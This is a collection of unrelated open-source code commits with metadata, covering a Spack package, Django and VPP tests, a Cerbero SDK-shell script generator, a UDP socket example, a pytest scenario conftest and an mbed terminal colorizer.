# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class PyPyani(PythonPackage):
"""pyani is a Python3 module that provides support for calculating
average nucleotide identity (ANI) and related measures for whole genome
comparisons, and rendering relevant graphical summary output. Where
available, it takes advantage of multicore systems, and can integrate
with SGE/OGE-type job schedulers for the sequence comparisons."""
homepage = "http://widdowquinn.github.io/pyani"
url = "https://pypi.io/packages/source/p/pyani/pyani-0.2.7.tar.gz"
version('0.2.7', '239ba630d375a81c35b7c60fb9bec6fa')
version('0.2.6', 'd5524b9a3c62c36063ed474ea95785c9')
depends_on('python@3.5:')
depends_on('py-setuptools', type='build')
depends_on('py-matplotlib', type=('build', 'run'))
depends_on('py-seaborn', type=('build', 'run'))
# Required for ANI analysis
depends_on('py-biopython', type=('build', 'run'))
depends_on('py-pandas', type=('build', 'run'))
depends_on('py-scipy', type=('build', 'run'))
# Required for ANIb analysis
depends_on('blast-plus~python', type='run')
# Required for ANIm analysis
depends_on('mummer', type='run')
|
lgpl-2.1
|
Python
|
|
04ddb34d3dd312294bdc61f694f1db862091cf57
|
Create beta_move_zeroes.py
|
Orange9000/Codewars,Orange9000/Codewars
|
Solutions/beta_move_zeroes.py
|
Solutions/beta_move_zeroes.py
|
def move_zeroes(*args):
return sum([[x]*args.count(x) for x in range(min(args), max(args)+1) if x!=0], []) + \
[0]*args.count(0) if args else []
|
mit
|
Python
|
|
c45ccd0f258fcbb152ffa9597ceb1bacd472f73b
|
Add test for email backend coverage
|
masschallenge/impact-api,masschallenge/impact-api,masschallenge/impact-api,masschallenge/impact-api
|
web/impact/impact/tests/test_impact_email_backend.py
|
web/impact/impact/tests/test_impact_email_backend.py
|
from mock import patch
from django.core import mail
from django.test import TestCase
from django.urls import reverse
from impact.minimal_email_handler import MinimalEmailHandler
class TestEmailBackend(TestCase):
@patch("impact.impact_email_backend.ImpactEmailBackend._add_logging_headers")
@patch("django.core.mail.backends.smtp.EmailBackend.send_messages")
def test_email_contains_header_if_ses_config_set(
self,
mocked_backend,
mock_add_logging_headers
):
with self.settings(
SES_CONFIGURATION_SET="test",
EMAIL_BACKEND='mc.email_backends.AccelerateEmailBackend'):
MinimalEmailHandler(["a@example.com"],
"subject",
"body").send()
self.assertTrue(mock_add_logging_headers.called)
@patch("impact.impact_email_backend.ImpactEmailBackend._add_logging_headers")
@patch("django.core.mail.backends.smtp.EmailBackend.send_messages")
def test_email_does_not_contain_header_if_ses_config_not_set(
self,
mocked_backend,
mock_add_logging_headers
):
with self.settings(
SES_CONFIGURATION_SET="",
EMAIL_BACKEND='mc.email_backends.AccelerateEmailBackend'):
MinimalEmailHandler(["a@example.com"],
"subject",
"body").send()
self.assertFalse(mock_add_logging_headers.called)
|
mit
|
Python
|
|
33aa9e79d2fe331f88574c02ad297072455be86a
|
add command to create scripts with the shell env
|
nirbheek/cerbero,flexVDI/cerbero,ikonst/cerbero,justinjoy/cerbero,freedesktop-unofficial-mirror/gstreamer-sdk__cerbero,jackjansen/cerbero-2013,multipath-rtp/cerbero,ikonst/cerbero,sdroege/cerbero,nzjrs/cerbero,superdump/cerbero,nzjrs/cerbero,freedesktop-unofficial-mirror/gstreamer-sdk__cerbero,davibe/cerbero,superdump/cerbero,ramaxlo/cerbero,jackjansen/cerbero,flexVDI/cerbero,ikonst/cerbero,EricssonResearch/cerbero,BigBrother-International/gst-cerbero,AlertMe/cerbero,shoreflyer/cerbero,AlertMe/cerbero,BigBrother-International/gst-cerbero,brion/cerbero,nirbheek/cerbero,ramaxlo/cerbero,sdroege/cerbero,AlertMe/cerbero,ford-prefect/cerbero,sdroege/cerbero,multipath-rtp/cerbero,brion/cerbero,jackjansen/cerbero,freedesktop-unofficial-mirror/gstreamer-sdk__cerbero,ford-prefect/cerbero,EricssonResearch/cerbero,justinjoy/cerbero,davibe/cerbero,shoreflyer/cerbero,atsushieno/cerbero,ramaxlo/cerbero,brion/cerbero,fluendo/cerbero,lubosz/cerbero,centricular/cerbero,jackjansen/cerbero-2013,BigBrother-International/gst-cerbero,lubosz/cerbero,cee1/cerbero-mac,freedesktop-unofficial-mirror/gstreamer__cerbero,freedesktop-unofficial-mirror/gstreamer__cerbero,ylatuya/cerbero,OptoFidelity/cerbero,cee1/cerbero-mac,centricular/cerbero,jackjansen/cerbero-2013,GStreamer/cerbero,ylatuya/cerbero,shoreflyer/cerbero,nzjrs/cerbero,nirbheek/cerbero-old,ylatuya/cerbero,atsushieno/cerbero,ramaxlo/cerbero,shoreflyer/cerbero,justinjoy/cerbero,shoreflyer/cerbero,cee1/cerbero-mac,nicolewu/cerbero,multipath-rtp/cerbero,nirbheek/cerbero-old,freedesktop-unofficial-mirror/gstreamer__sdk__cerbero,nirbheek/cerbero-old,davibe/cerbero,centricular/cerbero,freedesktop-unofficial-mirror/gstreamer__cerbero,jackjansen/cerbero,AlertMe/cerbero,cee1/cerbero-mac,freedesktop-unofficial-mirror/gstreamer__sdk__cerbero,GStreamer/cerbero,OptoFidelity/cerbero,ylatuya/cerbero,fluendo/cerbero,AlertMe/cerbero,nirbheek/cerbero,nzjrs/cerbero,sdroege/cerbero,ikonst/cerbero,OptoFidelity/cerbero,GStreamer/cerbero,freedesktop-unofficial-mirror/gstreamer-sdk__cerbero,flexVDI/cerbero,fluendo/cerbero,davibe/cerbero,nirbheek/cerbero,OptoFidelity/cerbero,brion/cerbero,lubosz/cerbero,freedesktop-unofficial-mirror/gstreamer-sdk__cerbero,fluendo/cerbero,EricssonResearch/cerbero,flexVDI/cerbero,EricssonResearch/cerbero,brion/cerbero,ramaxlo/cerbero,atsushieno/cerbero,multipath-rtp/cerbero,atsushieno/cerbero,multipath-rtp/cerbero,BigBrother-International/gst-cerbero,ford-prefect/cerbero,GStreamer/cerbero,fluendo/cerbero,EricssonResearch/cerbero,freedesktop-unofficial-mirror/gstreamer__sdk__cerbero,atsushieno/cerbero,ikonst/cerbero,nzjrs/cerbero,nirbheek/cerbero-old,freedesktop-unofficial-mirror/gstreamer__sdk__cerbero,sdroege/cerbero,centricular/cerbero,jackjansen/cerbero,BigBrother-International/gst-cerbero,nicolewu/cerbero,ford-prefect/cerbero,superdump/cerbero,jackjansen/cerbero-2013,GStreamer/cerbero,nicolewu/cerbero,jackjansen/cerbero-2013,lubosz/cerbero,freedesktop-unofficial-mirror/gstreamer__cerbero,centricular/cerbero,justinjoy/cerbero,superdump/cerbero,flexVDI/cerbero
|
cerbero/commands/gensdkshell.py
|
cerbero/commands/gensdkshell.py
|
# cerbero - a multi-platform build system for Open Source software
# Copyright (C) 2012 Andoni Morales Alastruey <ylatuya@gmail.com>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Library General Public
# License as published by the Free Software Foundation; either
# version 2 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Library General Public License for more details.
#
# You should have received a copy of the GNU Library General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place - Suite 330,
# Boston, MA 02111-1307, USA.
import os
from cerbero.commands import Command, register_command
from cerbero.errors import FatalError
from cerbero.utils import _, N_, ArgparseArgument, shell
SCRIPT_TPL = '''\
#!/bin/bash
%s
%s
'''
class GenSdkShell(Command):
doc = N_('Create a script with the shell environment for the SDK')
name = 'gensdkshell'
DEFAULT_CMD = 'exec "$@"'
def __init__(self):
Command.__init__(self,
[ArgparseArgument('name', nargs=1, default='sdk-shell',
help=_('name of the scrips')),
ArgparseArgument('-o', '--output-dir', default='.',
help=_('output directory')),
ArgparseArgument('-p', '--prefix',
help=_('prefix of the SDK')),
ArgparseArgument('--cmd', default=self.DEFAULT_CMD,
help=_('command to run in the script')),
])
def run(self, config, args):
name = args.name[0]
prefix = args.prefix and args.prefix or config.prefix
libdir = os.path.join(prefix, 'lib')
py_prefix = config.py_prefix
output_dir = args.output_dir
cmd = args.cmd
self.runargs(config, name, output_dir, prefix, libdir, py_prefix, cmd)
def runargs(self, config, name, output_dir, prefix, libdir,
py_prefix, cmd=None):
cmd = cmd or self.DEFAULT_CMD
env = config.get_env(prefix, libdir, py_prefix)
env['PATH'] = '%s/bin:$PATH' % prefix
env['LDFLAGS'] = '-L%s' % libdir
envstr = ''
for e, v in env.iteritems():
v = v.replace(config.prefix, prefix)
envstr += '%s="%s"\n' % (e, v)
try:
filepath = os.path.join(output_dir, name)
with open(filepath, 'w+') as f:
f.write(SCRIPT_TPL % (envstr, cmd))
shell.call("chmod +x %s" % filepath)
except IOError, ex:
raise FatalError(_("Error creating script: %s", ex))
register_command(GenSdkShell)
|
lgpl-2.1
|
Python
|
|
a8c3bbc363a319cd2e5748b1265b6e00563d510a
|
add udp.py
|
tjctw/PythonNote,tjctw/PythonNote,tjctw/PythonNote,tjctw/PythonNote
|
Foundations.of.Python.Network.Programming.369p/udp.py
|
Foundations.of.Python.Network.Programming.369p/udp.py
|
import argparse, socket
from datetime import datetime
MAX_BYTES = 65535
def server(port):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(('127.0.0.1', port))
print('Listening at {}'.format(sock.getsockname()))
while True:
data, address = sock.recvfrom(MAX_BYTES)
text = data.decode('ascii')
print('The client at {} says {!r}'.format(address, text))
text = 'Your data was {} bytes long'.format(len(data))
data = text.encode('ascii')
sock.sendto(data, address)
def client(port):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
text = 'The time is {}'.format(datetime.now())
data = text.encode('ascii')
sock.sendto(data, ('127.0.0.1', port))
print('The OS assigned me the address {}'.format(sock.getsockname()))
data, address = sock.recvfrom(MAX_BYTES) # Danger!
text = data.decode('ascii')
print('The server {} replied {!r}'.format(address, text))
if __name__ == '__main__':
choices = {'client': client, 'server': server}
parser = argparse.ArgumentParser(description='Send and receive UDP locally')
parser.add_argument('role', choices=choices, help='which role to play')
parser.add_argument('-p', metavar='PORT', type=int, default=1060,
help='UDP port (default 1060)')
args = parser.parse_args()
function = choices[args.role]
function(args.p)
|
cc0-1.0
|
Python
|
|
b1c0b9afacb12e8255681db25a01b94f25fed89e
|
add http tps test
|
chrisy/vpp,chrisy/vpp,chrisy/vpp,FDio/vpp,chrisy/vpp,FDio/vpp,FDio/vpp,chrisy/vpp,FDio/vpp,FDio/vpp,FDio/vpp,chrisy/vpp,chrisy/vpp,chrisy/vpp,FDio/vpp,FDio/vpp
|
test/test_http.py
|
test/test_http.py
|
#!/usr/bin/env python3
""" Vpp HTTP tests """
import unittest
import os
import subprocess
import http.client
from framework import VppTestCase, VppTestRunner, Worker
from vpp_devices import VppTAPInterface
@unittest.skip("Requires root")
class TestHttpTps(VppTestCase):
""" HTTP test class """
@classmethod
def setUpClass(cls):
super(TestHttpTps, cls).setUpClass()
@classmethod
def tearDownClass(cls):
super(TestHttpTps, cls).tearDownClass()
def setUp(self):
self.client_ip4 = '172.0.0.2'
self.server_ip4 = '172.0.0.1'
self.vapi.cli(f'create tap id 0 host-ip4-addr {self.client_ip4}/24')
self.vapi.cli(f'set int ip addr tap0 {self.server_ip4}/24')
self.vapi.cli('set int state tap0 up')
self.vapi.session_enable_disable(is_enable=1)
def test_http_tps(self):
fname = 'test_file_1M'
self.vapi.cli('http tps uri tcp://0.0.0.0/8080')
con = http.client.HTTPConnection(f"{self.server_ip4}", 8080)
con.request('GET', f'/{fname}')
r = con.getresponse()
self.assertEqual(len(r.read()), 1 << 20)
if __name__ == '__main__':
unittest.main(testRunner=VppTestRunner)
|
apache-2.0
|
Python
|
|
51b90afe8388b0425810bc1560cffe2e5a02fca8
|
Add boolean matrix generator - from mocogenomics
|
andretadeu/jhu-immuno,andretadeu/jhu-immuno
|
code/generate_boolean_matrix.py
|
code/generate_boolean_matrix.py
|
import itertools
letters = ['A','R','N','D','C','E','Q','G','H','I','L','K','M','F','P','S','T','W','Y','V']
# generates a matrix from all peptides and saves to CSV
def generateBooleanMatrix(peptides):
# generate header ------
peptide_length = 9
aa_list = ['A','R','N','D','C','E','Q','G','H','I','L','K','M','F','P','S','T','W','Y','V']
positions = []
for i in xrange(1, peptide_length + 1):
positions.append("Pos%(i)s" % vars())
tuples = [e for e in itertools.product(positions, ''.join(aa_list))]
header = ['peptide']
for i in xrange(len(tuples)):
header.append(''.join(tuples[i]))
# initialize master matrix and add header as a row
matrix = []
matrix.append(header)
# generate array for each peptide and concatenate -----
for peptide in peptides:
print 'Peptide:' # for testing
print peptide # for testing
amino_acids = list(peptide)
peptide_positions = [peptide]
# create subarray for each position and concatenate
for i in xrange(len(peptide)):
subarr = []
# create subarray with boolean values for amino acid presence based on order of aa_list array
for j in xrange(len(aa_list)):
if peptide[i] == aa_list[j]:
subarr += [1]
else:
subarr += [0]
# add extra zeroes if peptide length < maximum peptide length
if len(amino_acids) < peptide_length:
for k in xrange(peptide_length - len(aa_list), max_length):
subarr += [0]
# concatenate booleans for one position to list
peptide_positions += subarr
# add peptide row to master matrix
matrix.append(peptide_positions)
return matrix
# save to CSV -------
|
mit
|
Python
|
|
05dace442d2d6123703910ea80aec6e989c65009
|
create the conftest file that does all the magic
|
jtaleric/ceph-ansible,bengland2/ceph-ansible,jtaleric/ceph-ansible,guits/ceph-ansible,WingkaiHo/ceph-ansible,jsaintrocc/ceph-ansible,ceph/ceph-ansible,WingkaiHo/ceph-ansible,bengland2/ceph-ansible,jsaintrocc/ceph-ansible,albertomurillo/ceph-ansible,travmi/ceph-ansible,font/ceph-ansible,albertomurillo/ceph-ansible,albertomurillo/ceph-ansible,guits/ceph-ansible,WingkaiHo/ceph-ansible,fgal/ceph-ansible,fgal/ceph-ansible,ceph/ceph-ansible,travmi/ceph-ansible,font/ceph-ansible
|
tests/conftest.py
|
tests/conftest.py
|
import os
import pytest
import imp
def pytest_addoption(parser):
default = 'scenario.py'
parser.addoption(
"--scenario",
action="store",
default=default,
help="YAML file defining scenarios to test. Currently defaults to: %s" % default
)
def load_scenario_config(filepath, **kw):
'''
Creates a configuration dictionary from a file.
:param filepath: The path to the file.
'''
abspath = os.path.abspath(os.path.expanduser(filepath))
conf_dict = {}
if not os.path.isfile(abspath):
raise RuntimeError('`%s` is not a file.' % abspath)
# First, make sure the code will actually compile (and has no SyntaxErrors)
with open(abspath, 'rb') as f:
compiled = compile(f.read(), abspath, 'exec')
# Next, attempt to actually import the file as a module.
# This provides more verbose import-related error reporting than exec()
absname, _ = os.path.splitext(abspath)
basepath, module_name = absname.rsplit(os.sep, 1)
imp.load_module(
module_name,
*imp.find_module(module_name, [basepath])
)
# If we were able to import as a module, actually exec the compiled code
exec(compiled, globals(), conf_dict)
conf_dict['__file__'] = abspath
return conf_dict
def pytest_configure_node(node):
node_id = node.slaveinput['slaveid']
scenario_path = os.path.abspath(node.config.getoption('--scenario'))
scenario = load_scenario_config(scenario_path)
node.slaveinput['node_config'] = scenario['nodes'][node_id]
node.slaveinput['scenario_config'] = scenario
@pytest.fixture(scope='session')
def node_config(request):
return request.config.slaveinput['node_config']
@pytest.fixture(scope="session")
def scenario_config(request):
return request.config.slaveinput['scenario_config']
def pytest_report_header(config):
"""
Hook to add extra information about the execution environment and to be
able to debug what did the magical args got expanded to
"""
lines = []
scenario_path = str(config.rootdir.join(config.getoption('--scenario')))
if not config.remote_execution:
lines.append('execution environment: local')
else:
lines.append('execution environment: remote')
lines.append('loaded scenario: %s' % scenario_path)
lines.append('expanded args: %s' % config.extended_args)
return lines
def pytest_cmdline_preparse(args, config):
# Note: we can only do our magical args expansion if we aren't already in
# a remote node via xdist/execnet so return quickly if we can't do magic.
# TODO: allow setting an environment variable that helps to skip this kind
# of magical argument expansion
if os.getcwd().endswith('pyexecnetcache'):
return
scenario_path = os.path.abspath(config.getoption('--scenario'))
scenarios = load_scenario_config(scenario_path, args=args)
rsync_dir = os.path.dirname(str(config.rootdir.join('functional')))
test_path = str(config.rootdir.join('functional/tests'))
nodes = []
config.remote_execution = True
for node in scenarios.get('nodes', []):
nodes.append('--tx')
nodes.append('vagrant_ssh={node_name}//id={node_name}'.format(node_name=node))
args[:] = args + ['--max-slave-restart', '0', '--dist=each'] + nodes + ['--rsyncdir', rsync_dir, test_path]
config.extended_args = ' '.join(args)
|
apache-2.0
|
Python
|
|
7de5d0df0b726c629724d931766ede629a451d18
|
Add logging tests.
|
AdamGagorik/pydarkstar,LegionXI/pydarkstar
|
tests/logutils.py
|
tests/logutils.py
|
"""
.. moduleauthor:: Adam Gagorik <adam.gagorik@gmail.com>
"""
import unittest
import pydarkstar.logutils
pydarkstar.logutils.setDebug()
class TestLogutils(unittest.TestCase):
pass
if __name__ == '__main__':
unittest.main()
|
mit
|
Python
|
|
7a7c8c1f735982ca8403aec05861430ba70aca7f
|
add a test that checks _mssql whilst being run in threads
|
JimDennis/pymssql,zerolugithub/pymssql,djhenderson/pymssql,Alwnikrotikz/pymssql,Aloomaio/pymssql,JimDennis/pymssql,MunDaesik/pymssql,pymssql/pymssql,thegooglecodearchive/pymssql,msabramo/pymssql,msabramo/pymssql,klothe/pymssql,Aloomaio/pymssql,Aloomaio/pymssql,google-code-export/pymssql,bladams/pymssql,google-code-export/pymssql,bladams/pymssql,ramiro/pymssql,klothe/pymssql,djhenderson/pymssql,AlanZatarain/pymssql,google-code-export/pymssql,MunDaesik/pymssql,zerolugithub/pymssql,bladams/pymssql,MunDaesik/pymssql,thegooglecodearchive/pymssql,AlanZatarain/pymssql,Alwnikrotikz/pymssql,thegooglecodearchive/pymssql,AlanZatarain/pymssql,pymssql/pymssql,ramiro/pymssql,ramiro/pymssql,JimDennis/pymssql,djhenderson/pymssql,Alwnikrotikz/pymssql,zerolugithub/pymssql,msabramo/pymssql,klothe/pymssql
|
tests/threaded.py
|
tests/threaded.py
|
import _mssql
import unittest
import threading
from mssqltests import server, username, password, database
class TestingThread(threading.Thread):
def run(self):
self.running = True
mssql = _mssql.connect(server, username, password)
mssql.select_db(database)
for i in xrange(0, 100):
mssql.execute_query('SELECT %d', (i,))
for row in mssql:
assert row[0] == i
mssql.close()
self.running = True
class ThreadedTests(unittest.TestCase):
def testThreadedUse(self):
threads = []
for i in xrange(0, 5):
thread = TestingThread()
thread.start()
threads.append(thread)
running = True
while running:
running = False
for thread in threads:
if thread.is_alive():
running = True
break
if __name__ == '__main__':
unittest.main()
|
lgpl-2.1
|
Python
|
|
5fbcc25b46a5886307a1dba3d2771c3dd39b0570
|
Format and document colorize
|
fahhem/mbed-os,Archcady/mbed-os,geky/mbed,fanghuaqi/mbed,kl-cruz/mbed-os,c1728p9/mbed-os,jeremybrodt/mbed,fahhem/mbed-os,mazimkhan/mbed-os,bulislaw/mbed-os,j-greffe/mbed-os,arostm/mbed-os,theotherjimmy/mbed,theotherjimmy/mbed,radhika-raghavendran/mbed-os5.1-onsemi,infinnovation/mbed-os,radhika-raghavendran/mbed-os5.1-onsemi,CalSol/mbed,ryankurte/mbed-os,fvincenzo/mbed-os,fahhem/mbed-os,adustm/mbed,andcor02/mbed-os,betzw/mbed-os,adustm/mbed,fanghuaqi/mbed,cvtsi2sd/mbed-os,mazimkhan/mbed-os,CalSol/mbed,pradeep-gr/mbed-os5-onsemi,fvincenzo/mbed-os,betzw/mbed-os,bcostm/mbed-os,ryankurte/mbed-os,netzimme/mbed-os,mmorenobarm/mbed-os,nRFMesh/mbed-os,ryankurte/mbed-os,kjbracey-arm/mbed,arostm/mbed-os,netzimme/mbed-os,fvincenzo/mbed-os,mazimkhan/mbed-os,monkiineko/mbed-os,catiedev/mbed-os,j-greffe/mbed-os,andreaslarssonublox/mbed,ryankurte/mbed-os,bulislaw/mbed-os,CalSol/mbed,Archcady/mbed-os,mmorenobarm/mbed-os,mmorenobarm/mbed-os,infinnovation/mbed-os,netzimme/mbed-os,theotherjimmy/mbed,andreaslarssonublox/mbed,j-greffe/mbed-os,andcor02/mbed-os,cvtsi2sd/mbed-os,andreaslarssonublox/mbed,screamerbg/mbed,mbedmicro/mbed,YarivCol/mbed-os,mikaleppanen/mbed-os,monkiineko/mbed-os,jeremybrodt/mbed,mazimkhan/mbed-os,adustm/mbed,RonEld/mbed,svastm/mbed,betzw/mbed-os,fahhem/mbed-os,geky/mbed,NXPmicro/mbed,adustm/mbed,NXPmicro/mbed,adustm/mbed,HeadsUpDisplayInc/mbed,tung7970/mbed-os-1,bcostm/mbed-os,ryankurte/mbed-os,HeadsUpDisplayInc/mbed,mbedmicro/mbed,maximmbed/mbed,mbedmicro/mbed,fahhem/mbed-os,mikaleppanen/mbed-os,fanghuaqi/mbed,nRFMesh/mbed-os,pradeep-gr/mbed-os5-onsemi,arostm/mbed-os,netzimme/mbed-os,kl-cruz/mbed-os,mbedmicro/mbed,radhika-raghavendran/mbed-os5.1-onsemi,mikaleppanen/mbed-os,betzw/mbed-os,YarivCol/mbed-os,maximmbed/mbed,HeadsUpDisplayInc/mbed,adamgreen/mbed,betzw/mbed-os,bulislaw/mbed-os,screamerbg/mbed,maximmbed/mbed,andcor02/mbed-os,mbedmicro/mbed,bcostm/mbed-os,nRFMesh/mbed-os,mikaleppanen/mbed-os,cvtsi2sd/mbed-os,tung7970/mbed-os,screamerbg/mbed,HeadsUpDisplayInc/mbed,arostm/mbed-os,maximmbed/mbed,svogl/mbed-os,c1728p9/mbed-os,HeadsUpDisplayInc/mbed,pradeep-gr/mbed-os5-onsemi,mmorenobarm/mbed-os,monkiineko/mbed-os,YarivCol/mbed-os,monkiineko/mbed-os,c1728p9/mbed-os,RonEld/mbed,fahhem/mbed-os,jeremybrodt/mbed,radhika-raghavendran/mbed-os5.1-onsemi,RonEld/mbed,YarivCol/mbed-os,kjbracey-arm/mbed,mazimkhan/mbed-os,tung7970/mbed-os,geky/mbed,screamerbg/mbed,mikaleppanen/mbed-os,andcor02/mbed-os,fanghuaqi/mbed,karsev/mbed-os,ryankurte/mbed-os,screamerbg/mbed,arostm/mbed-os,nvlsianpu/mbed,catiedev/mbed-os,j-greffe/mbed-os,j-greffe/mbed-os,jeremybrodt/mbed,bulislaw/mbed-os,infinnovation/mbed-os,fvincenzo/mbed-os,fvincenzo/mbed-os,kl-cruz/mbed-os,Archcady/mbed-os,svogl/mbed-os,bcostm/mbed-os,netzimme/mbed-os,tung7970/mbed-os-1,tung7970/mbed-os-1,c1728p9/mbed-os,infinnovation/mbed-os,bcostm/mbed-os,catiedev/mbed-os,karsev/mbed-os,nRFMesh/mbed-os,jeremybrodt/mbed,nRFMesh/mbed-os,radhika-raghavendran/mbed-os5.1-onsemi,RonEld/mbed,tung7970/mbed-os-1,theotherjimmy/mbed,svogl/mbed-os,nvlsianpu/mbed,NXPmicro/mbed,pradeep-gr/mbed-os5-onsemi,geky/mbed,netzimme/mbed-os,maximmbed/mbed,pradeep-gr/mbed-os5-onsemi,svastm/mbed,geky/mbed,cvtsi2sd/mbed-os,mmorenobarm/mbed-os,monkiineko/mbed-os,pradeep-gr/mbed-os5-onsemi,Archcady/mbed-os,adustm/mbed,adamgreen/mbed,adamgreen/mbed,YarivCol/mbed-os,svogl/mbed-os,NXPmicro/mbed,mikaleppanen/mbed-os,nRFMesh/mbed-os,RonEld/mbed,Archcady/mbed-os,karsev/mbed-os,NXPmicro/mbed,kl-cruz/mbed-os,nvlsianpu/mbed,kl-cruz/mbed-os,karsev/mbed-os,catiedev/mbed-os,cvtsi2sd/mbed-os,svogl/mbed-os,kjbracey-arm/mbed,nvlsianpu/mbed,mazimkhan/mbed-os,fanghuaqi/mbed,infinnovation/mbed-os,CalSol/mbed,svastm/mbed,RonEld/mbed,c1728p9/mbed-os,adamgreen/mbed,bulislaw/mbed-os,bcostm/mbed-os,YarivCol/mbed-os,andreaslarssonublox/mbed,tung7970/mbed-os,theotherjimmy/mbed,catiedev/mbed-os,mmorenobarm/mbed-os,betzw/mbed-os,karsev/mbed-os,CalSol/mbed,arostm/mbed-os,catiedev/mbed-os,maximmbed/mbed,andreaslarssonublox/mbed,svogl/mbed-os,nvlsianpu/mbed,svastm/mbed,nvlsianpu/mbed,NXPmicro/mbed,andcor02/mbed-os,radhika-raghavendran/mbed-os5.1-onsemi,kl-cruz/mbed-os,adamgreen/mbed,j-greffe/mbed-os,tung7970/mbed-os-1,HeadsUpDisplayInc/mbed,infinnovation/mbed-os,kjbracey-arm/mbed,screamerbg/mbed,bulislaw/mbed-os,c1728p9/mbed-os,CalSol/mbed,svastm/mbed,theotherjimmy/mbed,cvtsi2sd/mbed-os,tung7970/mbed-os,tung7970/mbed-os,andcor02/mbed-os,Archcady/mbed-os,karsev/mbed-os,adamgreen/mbed,monkiineko/mbed-os
|
tools/colorize.py
|
tools/colorize.py
|
# mbed SDK
# Copyright (c) 2016 ARM Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" This python file is responsible for generating colorized notifiers.
"""
import sys
import re
from colorama import init, Fore, Back, Style
init()
COLORS = {
'none' : "",
'default' : Style.RESET_ALL,
'black' : Fore.BLACK,
'red' : Fore.RED,
'green' : Fore.GREEN,
'yellow' : Fore.YELLOW,
'blue' : Fore.BLUE,
'magenta' : Fore.MAGENTA,
'cyan' : Fore.CYAN,
'white' : Fore.WHITE,
'on_black' : Back.BLACK,
'on_red' : Back.RED,
'on_green' : Back.GREEN,
'on_yellow' : Back.YELLOW,
'on_blue' : Back.BLUE,
'on_magenta' : Back.MAGENTA,
'on_cyan' : Back.CYAN,
'on_white' : Back.WHITE,
}
COLOR_MATCHER = re.compile(r"(\w+)(\W+on\W+\w+)?")
def colorstring_to_escapecode(color_string):
""" Convert a color string from a string into an ascii escape code that
will print that color on the terminal.
Positional arguments:
color_string - the string to parse
"""
match = re.match(COLOR_MATCHER, color_string)
if match:
return COLORS[match.group(1)] + \
(COLORS[match.group(2).strip().replace(" ", "_")]
if match.group(2) else "")
else:
return COLORS['default']
def print_in_color_notifier(color_map, print_fn):
""" Wrap a toolchain notifier in a colorizer. This colorizer will wrap
notifications in a color if the severity matches a color in the *color_map*.
"""
def wrap(event, silent=False):
"""The notification function inself"""
file_desc = sys.stdout
self = event['toolchain']
if file_desc.isatty() and 'severity' in event and \
event['severity'] in color_map:
file_desc.write(colorstring_to_escapecode(
color_map[event['severity']]))
print_fn(self, event, silent)
file_desc.write(colorstring_to_escapecode('default'))
else:
print_fn(self, event, silent)
return wrap
|
"""
mbed SDK
Copyright (c) 2016 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
""" This python file is responsible for generating colorized notifiers.
"""
import sys
import re
from colorama import init, Fore, Back, Style
init()
colors = {
'none' : "",
'default' : Style.RESET_ALL,
'black' : Fore.BLACK,
'red' : Fore.RED,
'green' : Fore.GREEN,
'yellow' : Fore.YELLOW,
'blue' : Fore.BLUE,
'magenta' : Fore.MAGENTA,
'cyan' : Fore.CYAN,
'white' : Fore.WHITE,
'on_black' : Back.BLACK,
'on_red' : Back.RED,
'on_green' : Back.GREEN,
'on_yellow' : Back.YELLOW,
'on_blue' : Back.BLUE,
'on_magenta' : Back.MAGENTA,
'on_cyan' : Back.CYAN,
'on_white' : Back.WHITE,
}
# Convert a color string from a string into an ascii escape code that will print
# that color on the terminal.
color_matcher = re.compile(r"(\w+)(\W+on\W+\w+)?")
def colorstring_to_escapecode(color_string):
match = re.match(color_matcher, color_string)
if match:
return colors[match.group(1)] + (colors[match.group(2).strip().replace(" ","_")] if match.group(2) else "")
else:
return corols['default']
# Wrap a toolchain notifier in a colorizer. This colorizer will wrap notifications
# in a color if the severity matches a color in the *color_map*.
def print_in_color_notifier (color_map, print_fn):
def wrap(event, silent=False):
fd = sys.stdout
self = event['toolchain']
if fd.isatty() and 'severity' in event and event['severity'] in color_map:
fd.write(colorstring_to_escapecode(color_map[event['severity']]))
print_fn(self, event, silent)
fd.write(colorstring_to_escapecode('default'))
else:
print_fn(self, event, silent)
return wrap
|
apache-2.0
|
Python
|
d3c6845e83514f59f421d042cab9cf8fa817e33c
|
Add tests for common.signal.SignalCompare
|
ARM-software/bart
|
tests/test_signal.py
|
tests/test_signal.py
|
# Copyright 2015-2015 ARM Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import pandas as pd
import trappy
from utils_tests import TestBART
from bart.common.signal import SignalCompare
class TestSignalCompare(TestBART):
def __init__(self, *args, **kwargs):
